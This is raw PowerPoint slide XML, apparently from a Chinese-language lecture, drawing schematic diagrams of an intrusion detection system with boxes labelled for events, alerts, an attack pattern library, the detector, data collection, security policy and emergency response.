                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A9030A1-4017-4E72-A863-22102AC9F318}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2778" y="1515"/>
              <a:ext cx="0" cy="4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7" name="Line 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A10CD32-3FBE-4DD9-8251-05F6A9F58382}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3207" y="2050"/>
              <a:ext cx="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48" name="Line 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34710D5D-83B8-4DD6-81CB-00406B44E292}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3957" y="2050"/>
              <a:ext cx="0" cy="44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49" name="Line 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A1540C2-D004-468D-A52F-7366B5A73F82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4386" y="891"/>
              <a:ext cx="0" cy="160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50" name="Line 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A51D749F-CF3D-430C-A0E5-BF4FBFF4969E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4707" y="802"/>
              <a:ext cx="32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1" name="Line 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC44EC32-6E66-4CEE-9984-DDB5116DD928}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5029" y="802"/>
              <a:ext cx="0" cy="17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2" name="Line 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B04D983D-4A01-43E2-833A-9158E961785A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4600" y="2585"/>
              <a:ext cx="42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53" name="Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D570607-01A7-4F5D-A635-5257529B69EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1171" y="2942"/>
              <a:ext cx="1607" cy="267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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管理员</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146454" name="Line 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C5CC31-0C37-4918-8060-84B46CEF1874}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1921" y="2674"/>
              <a:ext cx="0" cy="2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5" name="Line 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DE2E2D2-EA19-4723-BAF0-F09615C1B3D8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1492" y="2674"/>
              <a:ext cx="13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6" name="Line 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9091D000-D03D-4C67-92DA-E7C7F921D149}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2886" y="2229"/>
              <a:ext cx="0" cy="4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57" name="Line 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB310A8-27DC-4DA0-BF11-6D92E567901C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1492" y="1605"/>
              <a:ext cx="0" cy="106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58" name="Line 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CBE0959-FF63-4FCE-AA27-5B53B921A87D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2778" y="3120"/>
              <a:ext cx="139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459" name="Line 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19B9337D-DA28-4B93-BCE4-B625C33A1B2F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4172" y="2763"/>
              <a:ext cx="0" cy="35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6460" name="Rectangle 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4649A47-58B0-44DF-AA3E-C1D3EDB3230A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2243" y="1248"/>
              <a:ext cx="643" cy="2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事件</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146461" name="Rectangle 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5A6FDB5-D5C4-4581-B55A-6F3C14124C73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3314" y="1783"/>
              <a:ext cx="643" cy="2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警报</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146462" name="Rectangle 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{992621BE-918C-4AC9-9AA2-49CE7A52DD5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4032" y="1337"/>
              <a:ext cx="336" cy="53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通</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>告</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146463" name="Rectangle 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30CF8E4F-9CBB-4B8A-934C-AF4B9F27EC78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4707" y="1337"/>
              <a:ext cx="285" cy="6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应急</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146464" name="Rectangle 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF0D96AC-BBC8-47D1-8747-06A95E226152}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3216" y="2976"/>
              <a:ext cx="965" cy="2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安全策略</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146465" name="Rectangle 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{422649B6-02D5-43CC-8AE1-C0642058528F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1600" y="2407"/>
              <a:ext cx="964" cy="26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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>安全策略</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146466" name="Rectangle 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC42A09B-E8E0-4F6A-93B8-F77C88C7C5A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1600" y="3387"/>
              <a:ext cx="2786" cy="3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800" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>入侵检测系统原理图</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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624ECE4A-ABAC-496B-B57A-F6B3E8D9A461}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="304800"/>
            <a:ext cx="86106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47459" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3661889-85A3-4D1F-91B3-1630A145AC93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="533400"/>
            <a:ext cx="8001000" cy="5410200"/>
            <a:chOff x="336" y="336"/>
            <a:chExt cx="5040" cy="3408"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147460" name="Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE95B729-22D1-468A-BCBF-2A5687FB9CB9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="336" y="336"/>
              <a:ext cx="5040" cy="340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47461" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78D81DF-AF18-4ABC-A83E-05FF63FAA710}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2495" y="1817"/>
              <a:ext cx="356" cy="457"/>
            </a:xfrm>
            <a:prstGeom prst="upArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 32093"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="eaVert"/>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47462" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67707A91-4CB0-4F1B-B961-F6F05E5519D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2320" y="672"/>
              <a:ext cx="801" cy="305"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>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攻击模式库</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147463" name="AutoShape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D83BBF26-859C-4FC4-AF10-621EE33FB439}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2233" y="1511"/>
              <a:ext cx="1068" cy="306"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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入侵检测器</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147464" name="AutoShape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F37D20D7-8E8E-4DF4-81BF-0BFEB4878559}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3894" y="1511"/>
              <a:ext cx="802" cy="306"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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应急措施</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147465" name="AutoShape 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7522E612-FEC7-472A-AA0E-A2DBF83EFF43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1008" y="1359"/>
              <a:ext cx="801" cy="305"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>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配置系统库</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147466" name="Line 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D36857E1-4A4F-46DA-B086-B60D796DDEA2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2757" y="979"/>
              <a:ext cx="1" cy="534"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="stealth" w="sm" len="lg"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:noFill/>
                </a14:hiddenFill>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147467" name="Line 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6522AC51-FFB8-4734-8DA8-AB3667DCEB6A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2757" y="1130"/>
              <a:ext cx="1514" cy="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68" name="Line 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{768F58EB-358C-4BE5-B561-9CEC5EFD369E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4244" y="1131"/>
              <a:ext cx="1" cy="382"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>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7469" name="Line 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98E07118-4508-431E-B083-3D8D593526A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1358" y="1664"/>
              <a:ext cx="1" cy="38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0" name="Line 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F82B544-24AB-401B-B500-8BC70DDDF104}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1358" y="2046"/>
              <a:ext cx="2849" cy="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7471" name="Line 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{190576A0-BD28-481E-ABFE-53CC8F525A44}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4157" y="1817"/>
              <a:ext cx="1" cy="229"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>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7472" name="Line 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B9D4140-554E-4327-A575-A9F40C3666A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2407" y="1817"/>
              <a:ext cx="1" cy="229"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>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7473" name="Line 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7616AF2B-485F-455B-850D-5BE21151E9B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3282" y="1664"/>
              <a:ext cx="623" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="3810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7474" name="AutoShape 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AD41718-68FD-4F27-8330-29510B5C4C9D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1358" y="2274"/>
              <a:ext cx="2226" cy="306"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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数据采集</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147475" name="AutoShape 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9649EAC0-369F-4A9B-B2BE-9A0CA290A061}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3894" y="2274"/>
              <a:ext cx="802" cy="306"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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安全控制</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147476" name="Line 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DBC44E9-1AB0-4F52-A2A0-7B1FF5620446}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4332" y="1817"/>
              <a:ext cx="1" cy="457"/>
            </a:xfrm>
